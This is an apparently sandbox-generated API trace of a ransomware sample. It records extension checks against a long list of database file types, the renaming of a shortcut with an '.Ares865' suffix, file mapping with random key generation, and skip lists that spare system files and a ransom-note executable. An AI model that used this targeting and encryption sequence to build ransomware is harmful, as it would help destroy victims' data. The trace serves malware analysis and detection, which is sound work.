[0059.016] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0059.016] lstrlenW (lpString="mdf") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0059.016] lstrlenW (lpString="mdb") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0059.016] lstrlenW (lpString="sql") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0059.016] lstrlenW (lpString="sqlite") returned 6 [0059.016] lstrcmpiW (lpString1="nt.lnk", lpString2="sqlite") returned -1 [0059.016] lstrlenW (lpString="sqlite3") returned 7 [0059.016] lstrcmpiW (lpString1="ent.lnk", lpString2="sqlite3") returned -1 [0059.016] lstrlenW (lpString="sqlitedb") returned 8 [0059.016] lstrcmpiW (lpString1="ient.lnk", lpString2="sqlitedb") returned -1 [0059.016] lstrlenW (lpString="xml") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0059.016] lstrlenW (lpString="$er") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0059.016] lstrlenW (lpString="4dd") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0059.016] lstrlenW (lpString="4dl") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0059.016] lstrlenW (lpString="^^^") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0059.017] lstrlenW (lpString="abs") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0059.017] lstrlenW (lpString="abx") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0059.017] lstrlenW (lpString="accdb") returned 5 [0059.017] lstrcmpiW (lpString1="t.lnk", lpString2="accdb") returned 1 [0059.017] lstrlenW (lpString="accdc") returned 5 [0059.017] lstrcmpiW (lpString1="t.lnk", lpString2="accdc") returned 1 [0059.017] lstrlenW (lpString="accde") returned 5 [0059.017] lstrcmpiW (lpString1="t.lnk", lpString2="accde") returned 1 [0059.017] lstrlenW (lpString="accdr") returned 5 [0059.017] lstrcmpiW (lpString1="t.lnk", lpString2="accdr") returned 1 [0059.017] lstrlenW (lpString="accdt") returned 5 [0059.017] lstrcmpiW (lpString1="t.lnk", lpString2="accdt") returned 1 [0059.017] lstrlenW (lpString="accdw") returned 5 [0059.017] lstrcmpiW (lpString1="t.lnk", lpString2="accdw") returned 1 [0059.017] lstrlenW (lpString="accft") returned 5 [0059.017] lstrcmpiW (lpString1="t.lnk", lpString2="accft") returned 1 [0059.017] lstrlenW (lpString="adb") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0059.017] lstrlenW (lpString="adb") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0059.017] lstrlenW (lpString="ade") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0059.017] lstrlenW (lpString="adf") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0059.017] lstrlenW (lpString="adn") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0059.017] lstrlenW (lpString="adp") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0059.017] lstrlenW (lpString="alf") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0059.017] lstrlenW (lpString="ask") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0059.017] lstrlenW (lpString="btr") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0059.017] lstrlenW (lpString="cat") returned 3 [0059.017] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0059.017] lstrlenW (lpString="cdb") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0059.018] lstrlenW (lpString="ckp") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0059.018] lstrlenW (lpString="cma") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0059.018] lstrlenW (lpString="cpd") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0059.018] lstrlenW (lpString="dacpac") returned 6 [0059.018] lstrcmpiW (lpString1="nt.lnk", lpString2="dacpac") returned 1 [0059.018] lstrlenW (lpString="dad") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0059.018] lstrlenW (lpString="dadiagrams") returned 10 [0059.018] lstrcmpiW (lpString1="ipient.lnk", lpString2="dadiagrams") returned 1 [0059.018] lstrlenW (lpString="daschema") returned 8 [0059.018] lstrcmpiW (lpString1="ient.lnk", lpString2="daschema") returned 1 [0059.018] lstrlenW (lpString="db-journal") returned 10 [0059.018] lstrcmpiW (lpString1="ipient.lnk", lpString2="db-journal") returned 1 [0059.018] lstrlenW (lpString="db-shm") returned 6 [0059.018] lstrcmpiW (lpString1="nt.lnk", lpString2="db-shm") returned 1 [0059.018] lstrlenW (lpString="db-wal") returned 6 [0059.018] lstrcmpiW (lpString1="nt.lnk", lpString2="db-wal") returned 1 [0059.018] lstrlenW (lpString="dbc") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0059.018] lstrlenW (lpString="dbs") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0059.018] lstrlenW (lpString="dbt") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0059.018] lstrlenW (lpString="dbv") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0059.018] lstrlenW (lpString="dbx") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0059.018] lstrlenW (lpString="dcb") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0059.018] lstrlenW (lpString="dct") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0059.018] lstrlenW (lpString="dcx") returned 3 [0059.018] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0059.018] lstrlenW (lpString="ddl") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0059.019] lstrlenW (lpString="dlis") returned 4 [0059.019] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0059.019] lstrlenW (lpString="dp1") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0059.019] lstrlenW (lpString="dqy") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0059.019] lstrlenW (lpString="dsk") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0059.019] lstrlenW (lpString="dsn") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0059.019] lstrlenW (lpString="dtsx") returned 4 [0059.019] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0059.019] lstrlenW (lpString="dxl") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0059.019] lstrlenW (lpString="eco") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0059.019] lstrlenW (lpString="ecx") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0059.019] lstrlenW (lpString="edb") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0059.019] lstrlenW (lpString="epim") returned 4 [0059.019] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0059.019] lstrlenW (lpString="fcd") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0059.019] lstrlenW (lpString="fdb") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0059.019] lstrlenW (lpString="fic") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0059.019] lstrlenW (lpString="flexolibrary") returned 12 [0059.019] lstrcmpiW (lpString1="ecipient.lnk", lpString2="flexolibrary") returned -1 [0059.019] lstrlenW (lpString="fm5") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0059.019] lstrlenW (lpString="fmp") returned 3 [0059.019] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0059.019] lstrlenW (lpString="fmp12") returned 5 [0059.019] lstrcmpiW (lpString1="t.lnk", lpString2="fmp12") returned 1 [0059.019] lstrlenW (lpString="fmpsl") returned 5 [0059.019] lstrcmpiW (lpString1="t.lnk", lpString2="fmpsl") returned 1 [0059.020] lstrlenW (lpString="fol") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0059.020] lstrlenW (lpString="fp3") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0059.020] lstrlenW (lpString="fp4") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0059.020] lstrlenW (lpString="fp5") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0059.020] lstrlenW (lpString="fp7") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0059.020] lstrlenW (lpString="fpt") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0059.020] lstrlenW (lpString="frm") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0059.020] lstrlenW (lpString="gdb") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0059.020] lstrlenW (lpString="gdb") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0059.020] lstrlenW (lpString="grdb") returned 4 [0059.020] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0059.020] lstrlenW (lpString="gwi") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0059.020] lstrlenW (lpString="hdb") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0059.020] lstrlenW (lpString="his") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0059.020] lstrlenW (lpString="ib") returned 2 [0059.020] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0059.020] lstrlenW (lpString="idb") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0059.020] lstrlenW (lpString="ihx") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0059.020] lstrlenW (lpString="itdb") returned 4 [0059.020] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0059.020] lstrlenW (lpString="itw") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0059.020] lstrlenW (lpString="jet") returned 3 [0059.020] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0059.020] lstrlenW (lpString="jtx") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0059.021] lstrlenW (lpString="kdb") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0059.021] lstrlenW (lpString="kexi") returned 4 [0059.021] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0059.021] lstrlenW (lpString="kexic") returned 5 [0059.021] lstrcmpiW (lpString1="t.lnk", lpString2="kexic") returned 1 [0059.021] lstrlenW (lpString="kexis") returned 5 [0059.021] lstrcmpiW (lpString1="t.lnk", lpString2="kexis") returned 1 [0059.021] lstrlenW (lpString="lgc") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0059.021] lstrlenW (lpString="lwx") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0059.021] lstrlenW (lpString="maf") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0059.021] lstrlenW (lpString="maq") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0059.021] lstrlenW (lpString="mar") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0059.021] lstrlenW (lpString="marshal") returned 7 [0059.021] lstrcmpiW (lpString1="ent.lnk", lpString2="marshal") returned -1 [0059.021] lstrlenW (lpString="mas") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0059.021] lstrlenW (lpString="mav") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0059.021] lstrlenW (lpString="maw") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0059.021] lstrlenW (lpString="mdbhtml") returned 7 [0059.021] lstrcmpiW (lpString1="ent.lnk", lpString2="mdbhtml") returned -1 [0059.021] lstrlenW (lpString="mdn") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0059.021] lstrlenW (lpString="mdt") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0059.021] lstrlenW (lpString="mfd") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0059.021] lstrlenW (lpString="mpd") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0059.021] lstrlenW (lpString="mrg") returned 3 [0059.021] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0059.022] lstrlenW (lpString="mud") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0059.022] lstrlenW (lpString="mwb") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0059.022] lstrlenW (lpString="myd") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0059.022] lstrlenW (lpString="ndf") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0059.022] lstrlenW (lpString="nnt") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0059.022] lstrlenW (lpString="nrmlib") returned 6 [0059.022] lstrcmpiW (lpString1="nt.lnk", lpString2="nrmlib") returned 1 [0059.022] lstrlenW (lpString="ns2") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0059.022] lstrlenW (lpString="ns3") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0059.022] lstrlenW (lpString="ns4") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0059.022] lstrlenW (lpString="nsf") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0059.022] lstrlenW (lpString="nv") returned 2 [0059.022] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0059.022] lstrlenW (lpString="nv2") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0059.022] lstrlenW (lpString="nwdb") returned 4 [0059.022] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0059.022] lstrlenW (lpString="nyf") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0059.022] lstrlenW (lpString="odb") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0059.022] lstrlenW (lpString="odb") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0059.022] lstrlenW (lpString="oqy") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0059.022] lstrlenW (lpString="ora") returned 3 [0059.022] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0059.022] lstrlenW (lpString="orx") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0059.023] lstrlenW (lpString="owc") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0059.023] lstrlenW (lpString="p96") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0059.023] lstrlenW (lpString="p97") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0059.023] lstrlenW (lpString="pan") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0059.023] lstrlenW (lpString="pdb") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0059.023] lstrlenW (lpString="pdm") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0059.023] lstrlenW (lpString="pnz") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0059.023] lstrlenW (lpString="qry") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0059.023] lstrlenW (lpString="qvd") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0059.023] lstrlenW (lpString="rbf") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0059.023] lstrlenW (lpString="rctd") returned 4 [0059.023] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0059.023] lstrlenW (lpString="rod") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0059.023] lstrlenW (lpString="rodx") returned 4 [0059.023] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0059.023] lstrlenW (lpString="rpd") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0059.023] lstrlenW (lpString="rsd") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0059.023] lstrlenW (lpString="sas7bdat") returned 8 [0059.023] lstrcmpiW (lpString1="ient.lnk", lpString2="sas7bdat") returned -1 [0059.023] lstrlenW (lpString="sbf") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0059.023] lstrlenW (lpString="scx") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0059.023] lstrlenW (lpString="sdb") returned 3 [0059.023] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0059.024] lstrlenW (lpString="sdc") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0059.024] lstrlenW (lpString="sdf") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0059.024] lstrlenW (lpString="sis") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0059.024] lstrlenW (lpString="spq") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0059.024] lstrlenW (lpString="te") returned 2 [0059.024] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0059.024] lstrlenW (lpString="teacher") returned 7 [0059.024] lstrcmpiW (lpString1="ent.lnk", lpString2="teacher") returned -1 [0059.024] lstrlenW (lpString="tmd") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0059.024] lstrlenW (lpString="tps") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0059.024] lstrlenW (lpString="trc") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0059.024] lstrlenW (lpString="trc") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0059.024] lstrlenW (lpString="trm") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0059.024] lstrlenW (lpString="udb") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0059.024] lstrlenW (lpString="udl") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0059.024] lstrlenW (lpString="usr") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0059.024] lstrlenW (lpString="v12") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0059.024] lstrlenW (lpString="vis") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0059.024] lstrlenW (lpString="vpd") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0059.024] lstrlenW (lpString="vvv") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0059.024] lstrlenW (lpString="wdb") returned 3 [0059.024] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0059.024] lstrlenW (lpString="wmdb") returned 4 [0059.025] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0059.025] lstrlenW (lpString="wrk") returned 3 [0059.025] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0059.025] lstrlenW (lpString="xdb") returned 3 [0059.025] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0059.025] lstrlenW (lpString="xld") returned 3 [0059.025] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0059.025] lstrlenW (lpString="xmlff") returned 5 [0059.025] lstrcmpiW (lpString1="t.lnk", lpString2="xmlff") returned -1 [0059.025] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\SendTo\\Fax Recipient.lnk.Ares865") returned 54 [0059.025] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default user\\sendto\\fax recipient.lnk"), lpNewFileName="C:\\Users\\Default User\\SendTo\\Fax Recipient.lnk.Ares865" (normalized: "c:\\users\\default user\\sendto\\fax recipient.lnk.ares865"), dwFlags=0x1) returned 1 [0059.032] CreateFileW (lpFileName="C:\\Users\\Default User\\SendTo\\Fax Recipient.lnk.Ares865" (normalized: "c:\\users\\default user\\sendto\\fax recipient.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0059.033] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1238) returned 1 [0059.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0059.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0059.033] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0059.034] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.034] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0059.034] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x15c [0059.036] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0059.043] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0059.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0059.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0059.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0059.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.044] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.044] CloseHandle (hObject=0x15c) returned 1 [0059.044] CloseHandle (hObject=0x118) returned 1 [0059.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0059.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0059.046] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49e569e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0059.046] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0059.046] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c48085e, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="aoldtz.exe") returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".") returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="..") returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="windows") returned -1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="bootmgr") returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="temp") returned -1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="pagefile.sys") returned -1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="boot") returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="ids.txt") returned 1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="ntuser.dat") returned -1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="perflogs") returned -1 [0059.046] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="MSBuild") returned -1 [0059.046] lstrlenW (lpString="Mail Recipient.MAPIMail") returned 23 [0059.046] lstrlenW (lpString="C:\\Users\\Default User\\SendTo\\Fax Recipient.lnk") returned 46 [0059.046] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Mail Recipient.MAPIMail" | out: lpString1="Mail Recipient.MAPIMail") returned="Mail Recipient.MAPIMail" [0059.046] lstrlenW (lpString="Mail Recipient.MAPIMail") returned 23 [0059.046] lstrlenW (lpString="Ares865") returned 7 [0059.046] lstrcmpiW (lpString1="APIMail", lpString2="Ares865") returned -1 [0059.046] lstrlenW (lpString=".dll") returned 4 [0059.047] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".dll") returned 1 [0059.047] lstrlenW (lpString=".lnk") returned 4 [0059.047] 